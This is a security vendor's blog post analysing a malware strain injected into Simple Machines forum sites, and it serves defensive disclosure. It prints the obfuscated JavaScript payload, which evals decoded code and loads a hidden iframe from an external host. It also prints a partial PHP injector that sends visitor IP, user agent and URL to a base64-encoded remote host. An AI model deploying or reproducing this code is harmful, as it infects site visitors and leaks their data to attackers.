• Simple Machines Malware

    Simple Machines is a forum software used by thousands of website owners around the world to build online communities into their websites. Unfortunately, it is a perfect target for malicious hackers too. Finding a way to compromise the Simple Machines installation to inject malware into a legitimate website thereby infecting its visitors is an attractive proposition for malicious hackers.

    This post will detail a fast-growing new strain of malware that has targeted Simple Machines enabled websites. At the time of posting, close to 30,000 websites have been infected with this malware. We detail the attack below.

    The malware
    This malware is primarily found in the form of a script element that contains the various commands to infect the website visitor.

    Interestingly, this malware also creates an Iframe element that loads additional malware from an external website. Notice the Iframe element at the end of the sample below (this creates a link to m-e.crossfitharlem.net).

    Malware sample (JavaScript):

    <script>b=new function(){return 2;};try{app[1][2]}catch(q){ss="";}try{gberbger-2;}catch(q){s=String;}ddd=new Date();d2=new Date(ddd.valueOf()-2);Object.prototype.asd='e';if('e'==={}.asd)a=document['createTextNode']('321');if(a.nodeValue==321)h=(ddd-d2)*-1;n='4.5a4.5a52.5a51a16a20a50a55.5a49.5a58.5a54.5a50.5a55a58a23a51.5a50.5a58a34.5a54a50.5a54.5a50.
    5a55a58a57.5a33a60.5a42a48.5a51.5a39a48.5a57.5a58a24.5a19.5a16a59.5a52.5a50a58a52a30.5a19.5a24.
    5a24a19.5a16a52a50.5a52.5a51.5a52a58a30.5a19.5a24.5a24a19.5a16a57.5a58a60.5a54a50.5a30.5a19.5a59a52.
    5a57.5a52.5a49a52.5a54a52.5a58a60.5a29a52a52.5a50a50a50.5a55a29.5a56a55.5a57.5a52.5a58a52.5a55.
    5a55a29a48.5a49a57.5a55.5a54a58.5a58a50.5a29.5a54a50.5a51a58a29a24a29.5a58a55.5a56a29a24a29.5a19.5a31a30a23.5a52.5a51a57a48.5a54.5a50.5a31a17a20.5a29.5a4.5a4.5a62.5a4.5a4.5a51a58.5a55a49.5a58a52.5a55.5a55a16a52.5a51a57a48.5a54.5a50.5a57a20a20.5a61.5a4.5a4.5a4.5a59a48.5a57a16a51a16a30.5a16a50a55.5a49.5a58.5a54.5a50.5a55a58a23a49.5a57a50.5a48.5a58a50.5a34.5a54a50.5a54.5a50.5a55a58a20a19.5a52.5a51a57a48.5a54.5a50.5a19.5a20.5a29.5a51a23a57.5a50.5a58a32.5a58a58a57a52.5a49a58.5a58a50.5a20a19.5a57.5a57a49.5a19.5a22a19.5a52a58a58a56a29a23.5a23.5a54.5a22.5a50.5a23a49.5a57a55.5a57.5a57.5a51a52.5a58a52a48.5a57a54a50.5a54.5a23a55a50.5a58a23.5a61a23.5a57.5a58a24.5a19.5a20.5a29.5a51a23a57.5a58a60.5a54a50.5a23a59a52.5a57.5a52.5a49a52.5a54a52.5a58a60.5a30.5a19.5a52a52.5a50a50a50.5a55a19.5a29.5a51a23a57.5a58a60.5a54a50.5a23a56a55.5a57.5a52.5a58a52.5a55.5a55a30.5a19.5a48.5a49a57.5a55.5a54a58.5a58a50.5a19.5a29.5a51a23a57.5a58a60.5a54a50.5a23a54a50.5a51a58a30.5a19.5a24a19.5a29.5a51a23a57.5a58a60.5a54a50.5a23a58a55.5a56a30.5a19.5a24a19.5a29.5a51a23a57.
    5a50.5a58a32.5a58a58a57a52.5a49a58.5a58a50.5a20a19.5a59.5a52.5a50a58a52a19.5a22a19.5a24.5a24a19.5a20.5a29.5a51a23a57.5a50.5a58a32.5a58a58a57a52.5a49a58.5a58a50.5a20a19.5a52a50.5a52.5a51.5a52a58a19.5a22a19.5a24.5a24a19.5a20.5a29.5a4.5a4.5a4.5a50a55.5a49.5a58.5a54.5a50.5a55a58a23a51.5a50.5a58a34.5a54a50.5a54.5a50.5a55a58a57.5a33a60.5a42a48.5a51.5a39a48.5a54.5a50.5a20a19.5a49a55.5a50a60.5a19.5a20.5a45.5a24a46.5a23a48.5a56a56a50.5a55a50a33.5a52a52.5a54a50a20a51a20.5a29.5a4.5a4.5a62.5';n=n
    ['split']('a');for(i=0;i!=n.length;i++)if(!+b)ss+=s.fromCharCode(-h*eval("n"+"[i]"));if(a.nodeValue==321)eval(ss);</script><iframe style="visibility: 
    hidden; position: absolute; left: 0pt; top: 0pt;" src="hxxp://m-e.crossfi tha rlem.net/z/st1" height="10" width="10"></iframe></body></html>
    

    What does the malware do?
    Malicious code (PHP) like that below has been found on the compromised websites.

    The code executes in two phases:

    1. The code below transfers information (user agent, IP address, etc…) to conqstat.com.
    2. The Javascript mentioned above is returned as a reply.

    Malware sample (PHP):

    <?php
    if (!isset($sRetry))
    {
    global $sRetry;
    $sRetry = 1;
        // This code use for global bot statistic
        $sUserAgent = strtolower($_SERVER['HTTP_USER_AGENT']); //  Looks for google serch bot
        $stCurlHandle = NULL;
        $stCurlLink = "";
        if((strstr($sUserAgent, 'google') == false)&&(strstr($sUserAgent, 'yahoo') == false)&&(strstr($sUserAgent, 'baidu') == false)&&(strstr($sUserAgent, 'msn') == false)&&(strstr($sUserAgent, 'opera') == false)&&(strstr($sUserAgent, 'chrome') == false)&&(strstr($sUserAgent, 'bing') == false)&&(strstr($sUserAgent, 'safari') == false)&&(strstr($sUserAgent, 'bot') == false)) // Bot comes
        {
            if(isset($_SERVER['REMOTE_ADDR']) == true && isset($_SERVER['HTTP_HOST']) == true){ // Create  bot analitics            
            $stCurlLink = base64_decode( 'aHR0cDovL2NvbnFzdGF0LmNvbS9zdGF0L3N0YXQucGhw').'?ip='.urlencode($_SERVER['REMOTE_ADDR']).'&useragent='.urlencode($sUserAgent).'&domainname='.urlencode($_SERVER['HTTP_HOST']).'&fullpath='.urlencode($_SERVER['REQUEST_URI']).'&check='.isset($_GET['look']);
                $stCurlHandle = curl_init( $stCurlLink ); 
    [snipped...]
    ?>
    

    How do I protect my site?
    Malicious hackers are constantly changing their tactics in order to evade detection and to continue to infect unsuspecting users. It is imperative to keep up-to-date on the latest ways that infections are spreading to legitimate websites.

    StopTheHacker.com customers are protected against these kind of threats. If you would like more information on how to protect your website, please feel free to contact us. You can also visit our services page to protect your website now.

    Till next time…